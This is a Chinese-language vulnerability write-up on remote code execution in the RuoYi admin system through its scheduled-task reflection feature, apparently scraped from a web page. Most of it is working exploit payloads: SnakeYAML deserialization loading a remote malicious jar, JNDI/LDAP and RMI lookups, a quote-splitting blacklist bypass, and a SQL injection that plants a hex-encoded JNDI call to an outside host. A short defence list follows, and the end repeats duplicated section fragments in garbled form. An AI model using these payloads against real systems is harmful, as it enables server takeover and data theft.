若依最新版后台RCE漏洞分析与利用<\/h1>

漏洞概述<\/h2>
若依(RuoYi)是一款基于Spring Boot和Vue.js的前后端分离权限管理系统。在最新版本(4.7.8)中，存在一个通过定时任务功能实现远程代码执行(RCE)的漏洞。该漏洞源于定时任务功能对目标类的反射调用机制存在缺陷，攻击者可以通过精心构造的payload绕过黑白名单限制，最终实现任意代码执行。<\/p>

漏洞原理分析<\/h2>

定时任务实现机制<\/h3>

若依系统的定时任务功能通过反射调用目标类实现，关键代码位于com.ruoyi.quartz.util.JobInvokeUtil<\/code>类中：<\/p>

if<\/span> (!<\/span>isValidClassName(<\/span>beanName))<\/span> {<\/span>
<\/span><\/span>    Object bean =<\/span> SpringUtils.<\/span>getBean<\/span>(<\/span>beanName);<\/span>
<\/span><\/span>    invokeMethod(<\/span>bean,<\/span> methodName,<\/span> methodParams);<\/span>
<\/span><\/span>}<\/span> else<\/span> {<\/span>
<\/span><\/span>    Object bean =<\/span> Class.<\/span>forName<\/span>(<\/span>beanName).<\/span>newInstance<\/span>();<\/span>
<\/span><\/span>    invokeMethod(<\/span>bean,<\/span> methodName,<\/span> methodParams);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>系统支持两种调用方式：<\/p>

Bean调用示例：ryTask.ryParams('ry')<\/code><\/li>
Class类调用示例：com.ruoyi.quartz.task.RyTask.ryParams('ry')<\/code><\/li>
<\/ol>
漏洞成因<\/h3>
漏洞的核心问题在于：<\/p>

反射调用时类名、方法名和参数完全可控<\/li>
黑白名单过滤机制存在缺陷，可以被绕过<\/li>
定时任务创建时的过滤与执行时的过滤不一致<\/li>
<\/ol>
历史版本漏洞利用<\/h2>
4.6.2版本及以下<\/h3>
在4.6.2及以下版本，定时任务创建时仅简单检查是否包含"rmi:\/\/"关键字，攻击者可利用多种方式实现RCE：<\/p>
1. SnakeYAML反序列化<\/h4>
org.<\/span>yaml<\/span>.<\/span>snakeyaml<\/span>.<\/span>Yaml<\/span>.<\/span>load<\/span>(<\/span>'<\/span>!!<\/span>javax.<\/span>script<\/span>.<\/span>ScriptEngineManager<\/span> [!!<\/span>java.<\/span>net<\/span>.<\/span>URLClassLoader<\/span> [[!!<\/span>java.<\/span>net<\/span>.<\/span>URL<\/span> [<\/span>"http:\/\/127.0.0.1:9999\/yaml-payload.jar"<\/span>]]]]<\/span>'<\/span>)<\/span>
<\/span><\/span><\/code><\/pre>攻击步骤：<\/p>

准备恶意jar包（可使用artsploit\/yaml-payload<\/a>）<\/li>
启动HTTP服务托管jar包<\/li>
通过定时任务执行上述payload<\/li>
<\/ol>
2. JNDI注入<\/h4>
javax.<\/span>naming<\/span>.<\/span>InitialContext<\/span>.<\/span>lookup<\/span>(<\/span>'<\/span>ldap:<\/span>\/\/127.0.0.1:8085\/calc')
<\/span><\/span><\/span><\/code><\/pre>3. RMI注入（4.6.2以下）<\/h4>
org.<\/span>springframework<\/span>.<\/span>jndi<\/span>.<\/span>JndiLocatorDelegate<\/span>.<\/span>lookup<\/span>(<\/span>'<\/span>rmi:<\/span>\/\/127.0.0.1:1099\/refObj')
<\/span><\/span><\/span><\/code><\/pre>4.7.0-4.7.1版本<\/h3>
这些版本增加了黑名单限制，过滤了ldap、http(s)、rmi等关键字，但可通过单引号绕过：<\/p>
org.<\/span>springframework<\/span>.<\/span>jndi<\/span>.<\/span>JndiLocatorDelegate<\/span>.<\/span>lookup<\/span>(<\/span>'r'<\/span>m'<\/span>i:<\/span>\/\/127.0.0.1:1099\/refObj')
<\/span><\/span><\/span><\/code><\/pre>绕过原理：系统会将参数中的单引号替换为空，从而绕过关键字检测。<\/p>
4.7.3版本<\/h3>
增加了白名单限制，只能调用com.ruoyi<\/code>包下的类，同时修复了之前的绕过方法。<\/p>
最新版(4.7.8)漏洞利用<\/h2>
虽然最新版加强了黑白名单限制，但仍存在绕过方法：<\/p>
利用SQL注入修改定时任务<\/h3>

利用GenController<\/code>中的SQL注入漏洞直接修改sys_job<\/code>表中的invoke_target<\/code>字段：<\/li>
<\/ol>
genTableServiceImpl.<\/span>createTable<\/span>(<\/span>'<\/span>UPDATE sys_job SET invoke_target =<\/span> 0x6a617661782e6e616d696e672e496e697469616c436f6e746578742e6c6f6f6b757028276c6461703a2f2f7863726c67696e75666a2e64677268332e636e2729<\/span> WHERE job_id =<\/span> 1<\/span>;<\/span>'<\/span>)<\/span>
<\/span><\/span><\/code><\/pre>
上述payload中的16进制解码后为：<\/li>
<\/ol>
javax.<\/span>naming<\/span>.<\/span>InitialContext<\/span>.<\/span>lookup<\/span>(<\/span>'<\/span>ldap:<\/span>\/\/xcrlginufj.dgrh3.cn')
<\/span><\/span><\/span><\/code><\/pre>
执行被修改的定时任务即可触发RCE<\/li>
<\/ol>
防御措施<\/h2>

升级到最新版本并应用所有安全补丁<\/li>
加强输入验证，对所有用户输入进行严格过滤<\/li>
限制反射调用的范围，仅允许必要的类和方法<\/li>
实施最小权限原则，限制系统账户权限<\/li>
监控系统日志，及时发现异常行为<\/li>
<\/ol>
总结<\/h2>
若依系统的RCE漏洞展示了从直接利用到逐步绕过防护的完整过程。最新版的漏洞利用需要结合SQL注入和定时任务功能，体现了现代Web应用安全中"漏洞链"利用的典型模式。开发者应重视安全设计，而安全人员则应持续关注系统更新和安全公告。<\/p>
参考资源<\/h2>

若依官方GitHub<\/a><\/li>
SnakeYAML反序列化分析<\/a><\/li>
yaml-payload项目<\/a><\/li>
若依漏洞分析文章<\/a><\/li>
<\/ol>

若依最新版后台RCE漏洞分析与利用<\/h1>

漏洞原理分析<\/h2>

历史版本漏洞利用<\/h2>

4.6.2版本及以下<\/h3> 在4.6.2及以下版本，定时任务创建时仅简单检查是否包含"rmi:\/\/"关键字，攻击者可利用多种方式实现RCE：<\/p>

4.7.0-4.7.1版本<\/h3> 这些版本增加了黑名单限制，过滤了ldap、http(s)、rmi等关键字，但可通过单引号绕过：<\/p>

4.7.3版本<\/h3> 增加了白名单限制，只能调用com.ruoyi<\/code>包下的类，同时修复了之前的绕过方法。<\/p>

参考资源<\/h2> 若依官方GitHub<\/a><\/li> SnakeYAML反序列化分析<\/a><\/li> yaml-payload项目<\/a><\/li> 若依漏洞分析文章<\/a><\/li> <\/ol>

4.6.2版本及以下<\/h3>
在4.6.2及以下版本，定时任务创建时仅简单检查是否包含"rmi:\/\/"关键字，攻击者可利用多种方式实现RCE：<\/p>

4.7.3版本<\/h3>
增加了白名单限制，只能调用`com.ruoyi<\/code>包下的类，同时修复了之前的绕过方法。<\/p>`

参考资源<\/h2>

若依官方GitHub<\/a><\/li>
SnakeYAML反序列化分析<\/a><\/li>
yaml-payload项目<\/a><\/li>
若依漏洞分析文章<\/a><\/li> <\/ol>